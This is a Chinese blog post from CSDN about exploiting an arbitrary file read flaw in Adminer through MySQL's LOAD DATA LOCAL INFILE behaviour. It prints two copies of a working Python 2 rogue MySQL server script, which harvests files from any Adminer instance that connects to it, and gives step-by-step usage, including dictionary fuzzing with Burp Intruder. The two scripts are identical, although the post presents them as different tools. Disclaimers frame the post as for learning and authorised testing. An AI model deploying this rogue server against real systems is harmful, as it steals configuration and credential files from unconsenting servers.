渗透测试中遇到的Adminer任意文件读取漏洞

已于 2023-05-12 15:45:41 修改
阅读量6.2k 收藏 1
点赞数 2
分类专栏: 漏洞复现 文章标签: mysql 数据库 php 安全漏洞 网络安全
于 2022-01-17 16:05:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45329947/article/details/122536336
版权

渗透测试中遇到的Adminer任意文件读取漏洞

免责声明:

本文章仅供学习和研究使用,严禁使用该文章内容对互联网其他应用进行非法操作,若将其用于非法目的,所造成的后果由您自行承担,产生的一切风险与本文作者无关,如继续阅读该文章即表明您默认遵守该内容。

软件简介

Adminer是一款轻量级的Web端数据库管理工具,支持MSSQL、MSSQL、Oracle、SQLite、PostgreSQL等众多主流数据库,类似于phpMyAdmin的MySQL管理客户端,整个程序只有一个PHP文件,易于使用安装,支持连接远程数据库。

漏洞原理

Adminer任意文件读取漏洞其实来源于MySQL“LOAD DATA INFILE”安全问题,Adminer4.6.3版本中已经修复了LOAD DATA LOCAL INFILE问题。

漏洞复现

在某次做项目的时候遇到一个mysql.php,打开发现是adminer,网上搜到任意文件读取复现的时候,用了网上很多的python脚本都无法运行起来(例如:https://github.com/allyshka/Rogue-MySql-Server)。在GitHub找到一个可以运行的脚本,原理是模拟mysql的运行。
在这里插入图片描述

字典脚本

# -*- coding: utf-8 -*-
import socket
import os
import sys

#--------------------------------------------------------------------------------------------------------------------
port = int(sys.argv[1])
#--------------------------------------------------------------------------------------------------------------------

def mysql_get_file_content(sv, filename):
    conn, address = sv.accept()
    logpath = os.path.abspath('.') + "/log/" + address[0]
    if not os.path.exists(logpath):
        os.makedirs(logpath)
    # Conn from address)
    conn.sendall(
        "\x4a\x00\x00\x00\x0a\x35\x2e\x35\x2e\x35\x33\x00\x17\x00\x00\x00\x6e\x7a\x3b\x54\x76\x73\x61\x6a\x00\xff\xf7\x21\x02\x00\x0f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x76\x21\x3d\x50\x5c\x5a\x32\x2a\x7a\x49\x3f\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00")
    conn.recv(9999)
    # auth okay
    conn.sendall("\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00")
    conn.recv(9999)
    # want file...
    wantfile = chr(len(filename) + 1) + "\x00\x00\x01\xFB" + filename
    conn.sendall(wantfile)
    content = conn.recv(9999)
    conn.close()

    if len(content) > 4:
        with open(logpath + "/" + filename.replace("/", "_").replace(":", "_"), "w") as txt:
            txt.write(content)
        return True
    else:
        return False



# 开始监听
sv = socket.socket()
sv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sv.bind(("", port))
sv.listen(5)
print "Listen Begin in port "+str(port)

# 日志文件夹




# 循环监听
while True:
    filename = raw_input("请输入接下来你想读的文件名 (直接按回车退出): ")
    if filename == "":
        break
    res = mysql_get_file_content(sv, filename)
    if res:
        print "Read Success! ---> "+filename
    else:
        print "Not Found~ ---> "+filename

直接输入文件读取脚本

# -*- coding: utf-8 -*-
import socket
import os
import sys

#--------------------------------------------------------------------------------------------------------------------
port = int(sys.argv[1])
#--------------------------------------------------------------------------------------------------------------------

def mysql_get_file_content(sv, filename):
    conn, address = sv.accept()
    logpath = os.path.abspath('.') + "/log/" + address[0]
    if not os.path.exists(logpath):
        os.makedirs(logpath)
    # Conn from address)
    conn.sendall(
        "\x4a\x00\x00\x00\x0a\x35\x2e\x35\x2e\x35\x33\x00\x17\x00\x00\x00\x6e\x7a\x3b\x54\x76\x73\x61\x6a\x00\xff\xf7\x21\x02\x00\x0f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x76\x21\x3d\x50\x5c\x5a\x32\x2a\x7a\x49\x3f\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00")
    conn.recv(9999)
    # auth okay
    conn.sendall("\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00")
    conn.recv(9999)
    # want file...
    wantfile = chr(len(filename) + 1) + "\x00\x00\x01\xFB" + filename
    conn.sendall(wantfile)
    content = conn.recv(9999)
    conn.close()

    if len(content) > 4:
        with open(logpath + "/" + filename.replace("/", "_").replace(":", "_"), "w") as txt:
            txt.write(content)
        return True
    else:
        return False



# 开始监听
sv = socket.socket()
sv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sv.bind(("", port))
sv.listen(5)
print "Listen Begin in port "+str(port)

# 日志文件夹




# 循环监听
while True:
    filename = raw_input("请输入接下来你想读的文件名 (直接按回车退出): ")
    if filename == "":
        break
    res = mysql_get_file_content(sv, filename)
    if res:
        print "Read Success! ---> "+filename
    else:
        print "Not Found~ ---> "+filename


这两个mysql任意文件读取脚本 一定能满足你的需求!

项目提供了两个文件,dicc和input, 一个采用字典的方式进行任意文件读取 一个采用交互式界面进行任意文件读取 不需要进入vim! 用字典直接读!命令行直接输! 结合burp intruder,直接fuzz出flag!

采用了socket的端口复用技术,防止端口被系统占用,想绑定就绑定,为所欲为! PS: 端口复用只能防止套接字关闭后被系统保留,如果端口上已经有mysql应用,则还是不能绑定​ 会爆socket.error: [Errno 10013]错误

直接输入文件绝对路径读取脚本使用方法

python2 exp_input.py port
例
python2 exp_input.py 3306

脚本运行需要使用python2环境
输入想要读取的文件绝对路径,然后回车
在这里插入图片描述
打开adminer页面输入服务器的IP,用户名密码数据库可以随便输入。然后点击登录
在这里插入图片描述
看到如下代表成功读取文件。
在这里插入图片描述
成功读取文件。
在这里插入图片描述

字典脚本使用方法

把路径字典写到dict.txt文件
在这里插入图片描述
然后运行

python2 exp_dicc.py port
例
python2 exp_dicc.py 3306

此时会进入监听,可以在命令行输入你想读的文件,然后发包即可,每次发完包需重新输入文件名 直接回车即可退出,读取成功的文件也会被计入到log文件夹
在这里插入图片描述
工具下载地址

使用抖音扫一扫关注我,带你学习网安知识,渗透实战,红队技巧。
在这里插入图片描述

免责声明:

仅限授权安全测试使用,禁止未授权非法攻击站点。本文章仅供学习和研究使用。严禁使用该文章内容对互联网其他应用进行非法操作,若将其用于非法目的,所造成的后果由您自行承担,产生的一切风险与本文作者无关,如继续阅读该文章即表明您默认遵守该内容。

网安君
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Adminer≤4.6.2任意文件读取漏洞1
08-03
Adminer≤4.6.2 任意读取漏洞0x01 前SQLite、PostgreSQL 等众多主流数据库,类似于 phpMyAdmin 的 MySQL 管理客
adminer-4.7.7_Adminer_MYSQL_php_
09-28
mysql类数据库管理工具adminer-4.7.7最新版。
CVE-2021-43008 vulhub 环境利用复现
最新发布
ldl345的博客
06-07 322
LOAD DATA INFILE作用是可以把文件读入到数据库的某个表里,如果在远程连接状态下使用了LOCAL关键字,即LOAD DATE LOCAL INFILE,那么就会快速读取本地文件到数据库,又因为攻击者已经操控了这个数据库,所以先读取本地文件到数据库,再在第四步对数据库文件进行查看。1.为了应用此漏洞,攻击者需求拜访 Adminer 的登录页面并操控的 MySQL 数据库:就是说攻击者已经得到了这个数据的账号和密码,能够用Adminer远程连接。这个工具,我直接下载的gui的jar版本。
配置文件读取绝对路径_Adminer任意文件读取漏洞复现
weixin_30014265的博客
01-31 1481
正文:943字8图预计阅读时间:3分钟简介Adminer是一款轻量级的Web端数据库管理工具,支持MSSQL、MSSQL、Oracle、SQLite、PostgreSQL等众多主流数据库,类似于phpMyAdmin的MySQL管理客户端,整个程序只有一个PHP文件,易于使用安装,支持连接远程数据库。https://www.adminer.org/#download漏洞复现在攻击机器...
任意文件读取/下载漏洞
qq_68163788的博客
05-23 2430
任意文件读取/下载漏洞是一种常见的网络安全漏洞,攻击者利用该漏洞可以访问和下载服务器上的任意文件,包括敏感信息、配置文件、数据库文件等。这种漏洞通常由于程序员在编写代码时未正确过滤用户输入导致,攻击者可以通过在输入插入特定的路径遍历字符(如../)来尝试访问系统上的其他文件。 攻击者利用任意文件读取/下载漏洞可以获取系统重要信息,如用户凭证、敏感数据等,进而造成严重的安全威胁。攻击者可以利用这些信息进行进一步的攻击,或者将其用于勒索、欺诈等恶意活动。
mysql 任意文件读取漏洞_Adminer任意文件读取漏洞
weixin_33918358的博客
02-07 2422
软件简介官方网站:https://www.adminer.org/Adminer是一款轻量级的Web端数据库管理工具,支持MSSQL、MSSQL、Oracle、SQLite、PostgreSQL等众多主流数据库,类似于phpMyAdmin的MySQL管理客户端,整个程序只有一个PHP文件,易于使用安装,支持连接远程数据库。漏洞原理Adminer任意文件读取漏洞其实来源于MySQL“LOAD DAT...
HTB-AdmirerToo
qq_53142368的博客
07-12 1983
HTB
vulhubAdminer远程文件读取漏洞复现(CVE-2021-43008)
yougexiaojiuguan的博客
02-03 1220
漏洞复现过程的记录,也是为了方便自己查看
HackTheBox::Admirer
aya3t的博客
10-14 799
HackTheBox::Admirer
ThinkPHP5远程命令执行漏洞
热门推荐
wkend的博客
01-02 1万+
0x01 ThinkPHP简介 ThinkPHP是一个基于MVC和面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布。从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,注重开发体验和易用性,为web应用开发提供了强有力的支持。 0x02 漏洞简介 (1)漏洞名称 ThinkPHP5远程命令执行 (2)漏洞描述 由于ThinkPHP5框架对控制器名没有进行足够的安...
【封神台】漏洞挖掘XXE wp
孤桜懶契
08-23 545
前言 掌控安全里面的靶场漏洞挖掘XXE实体注入,学习一下! 做XXE题目之前我们先了解一下XXE实体注入的原理和利用方法 XXE基础知识 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素 所有的 XML 文档(以及 HTML 文档)均由以下简单的构建模块构成:元素、属性、实体、PCDATA、CDATA,由于网上太多介绍就不详细说了 DTD(文档类型定
adminer-PHP
06-20
Adminer支持多语言(已自 带11种翻译语言文件,可以按自己的需求翻译相应的语言)。支持PHP4.3+,MySQL 4.1+以上的版本。 定制版更新: 本作品为分享工作室定制作品, 官方在2013-05-19发布3.7.0新版本adminer, 却没...
adminer.php
07-23
资源名称:adminer.php工具简介:Adminer是一个超轻量的MySQL管理工具,除了支持MySQL外,完整版本支持几乎所有的常见数据库。全部功能,只有一个PHP文件。几百K的体积,就有如此强大的功能。完全可以媲美phpMyAdmin ...
vulhubAdminer ElasticSearch 和 ClickHouse 错误页面SSRF漏洞复现(CVE-2021-21311)
yougexiaojiuguan的博客
02-03 1002
漏洞复现过程的记录,为了方便自己以后查看
mssql 数据导成文件_Adminer4.6.2任意文件读取漏洞
weixin_39866741的博客
12-16 624
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。0x01 前言Adminer是一款轻量级的Web端数据库管理工具,支持MSSQL、MSSQL、Oracle、SQLite、PostgreSQL等众多主流数据库,类...
adminer.php 漏洞,WordPress InBoundio Marketing Plugin 1.0 /admin/partials/csv_uploader.php 文件上传漏洞...
weixin_33973572的博客
03-18 317
/admin/partials/csv_uploader.php<?php$ds = DIRECTORY_SEPARATOR; //1$storeFolder = 'uploaded_csv'; //2if (!empty($_FILES)) {$_FILES['file']['name'] = preg_replace('/[^A-Za-z0-9 _ .-]/', ...
mysql-adminer任意文件读取
qq_51478862的博客
05-05 1187
利用条件 1.adminer(版本小于4.6.2)可以远程连接数据库,2.或者可以使靶机服务器主动连接自己的伪造的mysql服务器 原理 攻击者搭建一个伪造的mysql服务器,当有用户去连接上这个伪造的服务器时。攻击者就可以任意读取受害者的文件内容。,也就是A连接B的数据库,B可以伪造假的数据库服务读取A服务器上的文件。所以基于adminer连接的数据库可以反向利用连接自己的恶意服务器,从而达到读取任意文件的目的。 演示: 先下载好adminer,直接放在根路径即可:(攻击的服务器有adminerWeb
Vulhub——adminer
qq_55202378的博客
05-22 536
Adminer是一个PHP编写的开源数据库管理工具,支持MySQL、MariaDB、PostgreSQL、SQLite、MS SQL、Oracle、Elasticsearch、MongoDB等数据库。Adminer是一个PHP编写的开源数据库管理工具,支持MySQL、MariaDB、PostgreSQL、SQLite、MS SQL、Oracle、Elasticsearch、MongoDB等数据库。在Adminer登录页面填写恶意服务地址和用户名。,即可查看到Adminer的登录页面。
centos stream 8 安装文办Adminer
06-13
您可以按照以下步骤安装文版的 Adminer: 1. 安装 phpMyAdmin ``` sudo yum install epel-release -y sudo yum install phpMyAdmin -y ``` 2. 安装文语言包 ``` sudo yum install php-gettext -y ``` 3. 下载 Adminer 文语言包 ``` sudo mkdir /usr/share/adminer/lang sudo wget -O /usr/share/adminer/lang/zh-cn.php https://www.adminer.org/static/download/4.7.8/adminer-4.7.8-en.php ``` 4. 修改 Adminer 配置文件 ``` sudo cp /usr/share/adminer/adminer.php /usr/share/adminer/index.php sudo sed -i "s/English/简体文/g" /usr/share/adminer/index.php sudo sed -i "s/\/adminer.php/\/index.php/g" /etc/httpd/conf.d/adminer.conf ``` 5. 重启 Apache 服务 ``` sudo systemctl restart httpd ``` 现在您可以通过浏览器访问 `http://your-server-ip/adminer` 来使用文版的 Adminer 了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网安君

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值